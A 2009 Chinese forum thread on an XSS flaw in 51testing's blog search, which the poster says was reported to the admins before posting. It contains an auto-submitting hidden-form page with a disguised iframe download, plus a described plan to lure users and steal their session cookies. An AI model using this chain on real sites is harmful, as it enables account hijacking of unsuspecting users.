ljdfdd 发表于 2009-12-8 18:34:02

关于51testing博客跨站漏洞的初探[原创]

来51testing很久了,在上面学到了很多有用的知识,最近也写了些文章与大家共同探讨一些问题,在使用博客空间的过程中,无意中发现博客存在跨站的漏洞,所以提出来希望管理人员能尽快修复,共同维护这个知识交流的平台,废话不多说了,进入正题

顺便进入任何一个人的博客,就以安全测试版块的斑竹的空间为例吧(老大别砸我:)),进入

http://www.51testing.com/?uid/59943

找到标题搜索一栏,输入<script>alert()</script>,点击提交,

http://www.51testing.com/attachments/2009/12/99915_200912081233181XVJz.thumb.jpg
直接弹出框

http://www.51testing.com/attachments/2009/12/99915_200912081236021sNVO.thumb.jpg
呵呵,是个潜在的xss跨站漏洞,有戏了,如果是get就好办了

开动工具,用fiddler抓地址,发现是post提交,直接用地址这条路看来行不通,

打开源码,发现这段代码

</div><div id="search" class="xspace-sideblock">
   <h3 class="xspace-blocktitle">标题搜索</h3>
   <form. id="form11" action="http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1"

method="post">
   <input type="text" id="xspace-searchkey" name="searchkey" value=""/>
   <input type="hidden" name="searchsubmit" value="yes" />
   <input type="submit" name="xspace-dosearch" id="xspace-dosearch" value="搜索" />
   </form>

是直接提交到了http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1这个地址,把此网页保存到本地,新建一个html文件,把以下代码copy进去

<html>
<div style="display:none">
<form. id="form11" name="form11" action="http://www.51testing.com/index.php?uid/99915/action/spacelist/php/1" method="post">
   <input type="text" id="xspace-searchkey" name="searchkey" value="<script>alert()</script>"/>
   <input type="hidden" name="searchsubmit" value="yes" />
   <input type="submit" name="xspace-dosearch" id="xspace-dosearch" value="搜索" />
   </form>
</div>
<script>
setTimeout("test()",200);
function test()
{
document.forms("form11").submit();
}
</script>
<iframe. border="0" height="0" width="0"

src="http://d31.v.iask.com/fs/800/1/83427b664b2f30577be522796757a8482258518/exe/GetFlash9.exe"

/>

</html>

上面代码实现三个功能,一,在文本里默认输入js代码,二,自动提交post,三,用一个下载地址掩盖跳转的真实意图

好了,现在把上面的iframe的地址写成工具的真实地址,把这个网页顺便传到一个免费空间,然后在论坛里开个新帖,某某工具最新版下载,然后把访问这个html的地址贴上去,用户用浏览器访问时,弹出工具的下载地址,在毫不知情的情况下,用户的cookie已在我们手中了,各位可能又要扔砖了,咋我只弹出一个框,呵呵,别急,上面text的value只有<script>alert()</script>,当然只弹出一个框,如果你自己再写个网页专门负责接收document.cookie,那用户的帐号是大把大把的送上来,有的同学又问,咋写那个接收的网页,呵呵,对不起,我只是个测试人员,只提供思路,关于上面的流程的可行性我已做过测试,截图如下

http://www.51testing.com/attachments/2009/12/99915_200912081336421HlPF.thumb.jpg
放入明小子修改cookie,登陆成功
http://www.51testing.com/attachments/2009/12/99915_200912081426471g7Y4.thumb.jpg
大家可能激动的赶快去尝试,呵呵,不好意思,在发表此文章之前,我已通知管理员修改了,我在这里只提供一个安全测试方面的测试思路,希望对大家有帮助:)

[ 本帖最后由 ljdfdd 于 2009-12-8 18:40 编辑 ]

男孩子 发表于 2009-12-9 15:41:12

不错,支持

男孩子 发表于 2009-12-9 15:45:34

51Testing的BBS的论坛,只拿到Cookie可能还登录不了,应该还有其它的限制条件。

我和版上上海的同学做过测试,他把他那边的Cookie给我,我在我这边不能登录。
但是我自己的机器,比如IE登录后,拿到Cookie,然后在FF上替换该Cookie,直接就登录成功了。

fishy 发表于 2009-12-9 16:38:16

呵呵,不错不错……
非常感谢你呢

suei8423 发表于 2010-1-4 15:20:16

哈哈,有意思哦,51testing本身不会做安全测试吗?
页: [1]
查看完整版本: 关于51testing博客跨站漏洞的初探[原创]